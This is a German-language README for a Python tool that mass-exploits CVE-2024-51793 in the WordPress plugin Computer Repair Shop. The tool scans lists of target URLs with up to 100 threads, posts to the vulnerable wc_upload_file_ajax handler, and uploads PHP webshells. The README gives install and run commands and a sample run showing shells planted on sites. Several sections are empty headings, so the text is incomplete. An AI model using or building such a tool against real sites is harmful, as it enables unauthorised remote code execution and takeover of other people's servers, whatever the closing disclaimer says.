
Nutzt CVE-2024-51793 aus, einen nicht authentifizierten, beliebigen Datei-Upload im WordPress-Plugin Computer Repair Shop, scannt Ziellisten, lädt PHP-Webshells hoch und meldet verwundbare Websites.
📋 Übersicht CVE-2024-51793 ist eine Schwachstelle für nicht authentifizierten, beliebigen Dateiupload im Computer Repair Shop WordPress Plugin (Versionen vor 3.8116). Diese Schwachstelle ermöglicht Angreifern, ohne Authentifizierung beliebige Dateien, einschließlich PHP-Webshells, hochzuladen, was zu Remote Code Execution auf verwundbaren WordPress-Seiten führt.
🚨 Schwachstellendetails CVE ID: CVE-2024-51793
Vulnerability Type: Unauthenticated Arbitrary File Upload
Betroffenes Plugin: Computer Repair Shop WordPress Plugin
Betroffene Versionen: < 3.8116
Risikostufe: Critical (CVSS Score: 9.8)
🔧 Technische Details Die Schwachstelle existiert im wc_upload_file_ajax Action-Handler des Plugins, der die Dateitypen und die Benutzerauthentifizierung nicht ordnungsgemäß validiert, sodass nicht authentifizierte Angreifer schädliche Dateien direkt auf den Server hochladen können.
📦 Installation & Voraussetzungen Voraussetzungen Python 3.6+
Erforderliche Pakete: requests
Installation bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt 🛠️ Bedienungsanleitung Grundlegende Nutzung bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 Erweiterte Nutzung bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose Kommandozeilenargumente Argument Short Beschreibung Standard --list -l Pfad zur Datei mit Ziel-URLs (erforderlich) - --threads -t Anzahl der gleichzeitigen Threads 50 --output -o Ausgabeverzeichnis für Ergebnisse results Eingabedateiformat Erstellen Sie eine Textdatei (targets.txt) mit einer URL pro Zeile:
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 Funktionsweise
text /wp-content/plugins/computer-repair-shop/readme.txt 2. Versionserkennung Es überprüft, ob das Plugin "CRM WordPress Plugin" enthält und die Version unter 3.8116 liegt.
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. Webshell-Nutzlast Die hochgeladene Webshell bietet:
📊 Ausgabedateien Das Tool erstellt zwei Hauptausgabedateien:
🎯 Beispielausführung bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Exploit Tool ║
║ Unauthenticated RCE in Computer Repair Shop WP Plugin ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Loaded 150 unique targets [ INFO ] Starting scan with 30 threads
[ SCANNING ] Checking: http://example.com/ [ VULNERABLE ] Target identified: http://example.com/ [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANNING ] Checking: http://testsite.com/ [ NOT VULNERABLE ] Target: http://testsite.com/
[ COMPLETED ] Scan finished successfully 🛡️ Abwehrmaßnahmen Für Website-Betreiber Sofortmaßnahmen:
Präventive Maßnahmen:
Für Sicherheitsforscher
⚠️ Rechtliche & ethische Hinweise
🔄 Wartung Aktualisierungen Überprüfen Sie regelmäßig auf:
Fehlerbehebung Häufige Probleme und Lösungen:
📞 Unterstützung Bei Problemen und Verbesserungen:
📚 Referenzen
Haftungsausschluss: Dieses Tool sollte nur für legitime Sicherheitsforschung und autorisierte Penetrationstests verwendet werden. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.